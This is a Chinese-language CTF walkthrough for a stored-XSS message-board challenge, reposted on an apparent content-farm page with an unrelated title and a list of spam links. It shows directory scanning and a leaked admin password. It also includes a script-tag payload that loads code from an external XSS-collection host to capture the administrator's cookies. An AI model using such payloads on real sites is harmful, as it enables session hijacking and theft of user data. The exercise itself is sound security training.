当前位置: 首页 > news >正文

公司在网站做广告怎么做分录长沙seo咨询

news 2025/7/27 20:54:28
公司在网站做广告怎么做分录,长沙seo咨询,北京最贵商场,广东省政府网站内容建设题目描述 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台打开场景后界面如下: 解题思路 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端即然在服务器端,那就…

题目描述

在这里插入图片描述

  • 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
  • 打开场景后界面如下:

在这里插入图片描述

解题思路

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies

相关工具

  • 目录扫描工具:御剑
  • 或者dirsearch工具:python dirsearch.py -u url
  • url解码:https://www.iamwawa.cn/urldecode.html

解题步骤

  1. 测试一下script代码:
<script>alert(1)</script>

在这里插入图片描述
发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试
在这里插入图片描述
得到后台管理地址:http://114.67.175.224:10687/admin.php
在这里插入图片描述
账号密码不知道?
需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。
在这里插入图片描述
然后创建一个项目:
在这里插入图片描述

<sCRiPt sRC=//uj.ci/k3a></sCrIpT>

将项目中提供的代码输入留言板中:
在这里插入图片描述
然后,返回项目中查看效果:
在这里插入图片描述
这个时候就获取到cookies了,这就是我们需要的flag,注意记得转码(%7B 和%7D):

flag%7B826066e999f695cacd75a92ac9a0ac09%7D

在这里插入图片描述
所以就得到了falg:

flag{826066e999f695cacd75a92ac9a0ac09}

之前该题目是有个数据库文件db.sql文件,可以直接在扫描目录的时候就得到,内容如下:

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以发现,在最后有一行插入语句:

可以看到INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

账号admin,密码011be4d65feac1a8

这就是我们需要的账号密码,登入后发现弹出了弹窗:
在这里插入图片描述
但是,我们并没有得到我们想要的falg,那该如何?当然是获取cookies了:
直接F12,查看cookies即可:
在这里插入图片描述
或者直接在留言板中输入获取cookies的代码,在登录后台的时候自动弹出:

<script>alert(document.cookie)</script>

就像这样:
在这里插入图片描述

得到Flag

flag{826066e999f695cacd75a92ac9a0ac09}

在这里插入图片描述

新知识点

  1. 学会使用目录扫描工具
  2. 认识熟悉常见的url编码
http://www.dinnco.com/news/8035.html

相关文章:

  • 信阳网站建设找汉狮上海谷歌seo推广公司
  • 网站开发 chtml静态网页制作
  • 网页设计类网站淘宝关键词排名优化技巧
  • 国外有做塑料粒子的网站吗seo查询网站是什么
  • 广西网站推广青岛网站建设
  • 门户网站建设成本免费顶级域名注册
  • 企业网站seo诊断seo关键词排名优化品牌
  • 定做网站多少钱seo关键词查询工具
  • wordpress英文自动采集遵义网站seo
  • 无锡网页建站公司排名第一的助勃药
  • 国内做的好看的网站设计seo知识是什么意思
  • 鸡西市法院的网站建设公司网络营销试卷
  • 怎么选择丹徒网站建设广告推广
  • 网站关键词优化排名软件系统广州婚恋网站排名
  • 独立的手机网站seo关键词排名优化怎么样
  • 网站建设 证书深圳做推广哪家比较好
  • 开封市住房和城乡建设局网站免费网站自助建站系统
  • 做网站总结体会现在网络推广方式
  • 国家发改委网站开发区秦洁婷seo博客
  • 网站建设美工的职位要求网站seo外链
  • 公众号开发者模式后自动回复抚州seo排名
  • 政务网站党风廉政建设栏目seo网络营销
  • 网站导航页面制作站长工具网站排名
  • 教育机构有哪些品牌seo主要做什么
  • 河西网站建设开发济南网络营销外包
  • 招商网站建设推广百度秒收录神器
  • 汽车之家网页版入口官网搜索引擎优化简历
  • 做受免费网站今日新闻头条
  • 网络管理系统有哪些seo管理是什么
  • 郑州建设网站报价北京培训学校